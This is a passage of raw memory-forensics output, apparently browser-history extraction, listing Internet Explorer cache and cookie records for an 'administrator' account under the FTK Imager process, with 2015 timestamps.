File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xb4
File: bitnami-xampp[1].png
Data: HTTP/1.1 200 OK
ETag: "5675-51b671137bc00"
Content-Length: 22133
Keep-Alive: timeout=5, max=96
Content-Type: image/png

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987d80
Record length: 0x180
Location: http://localhost/dashboard/images/fastly-logo.png
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xb0
File: fastly-logo[1].png
Data: HTTP/1.1 200 OK
ETag: "6ea-51b671137bc00"
Content-Length: 1770
Keep-Alive: timeout=5, max=98
Content-Type: image/png

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987f00
Record length: 0x180
Location: http://localhost/dashboard/images/social-icons.png
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xb0
File: social-icons[1].png
Data: HTTP/1.1 200 OK
ETag: "d21-51b671137bc00"
Content-Length: 3361
Keep-Alive: ti
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3995000
Record length: 0x100
Location: Cookie:administrator@www.bing.com/
Last modified: 2015-08-23 10:31:57 UTC+0000
Last accessed: 2015-08-23 10:31:57 UTC+0000
File Offset: 0x100, Data Offset: 0x8c, Data Length: 0x0
File: administrator@www.bing[2].txt
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3995100
Record length: 0x100
Location: Cookie:administrator@google.jo/
Last modified: 2015-08-24 07:00:17 UTC+0000
Last accessed: 2015-08-24 07:00:17 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x0
File: administrator@google[2].txt
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3995200
Record length: 0x100
Location: Cookie:administrator@localhost/
Last modified: 2015-09-02 07:01:12 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x0
File: administrator@localhost[2].txt
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3995300
Record length: 0x100
Location: Cookie:administrator@localhost/
Last modified: 2015-09-03 10:03:01 UTC+0000
Last accessed: 2015-09-03 10:03:01 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x0
File: administrator@localhost[1].txt
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3995400
Record length: 0x100
Location: Cookie:administrator@bing.com/
Last modified: 2015-08-23 10:32:08 UTC+0000
Last accessed: 2015-08-23 10:32:08 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x0
File: administrator@bing[2].txt
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3995500
Record length: 0x100
Location: Cookie:administrator@ssl.bing.com/
Last modified: 2015-08-23 10:32:12 UTC+0000
Last accessed: 2015-08-23 10:32:12 UTC+0000
File Offset: 0x100, Data Offset: 0x8c, Data Length: 0x0
File: administrator@ssl.bing[2].txt
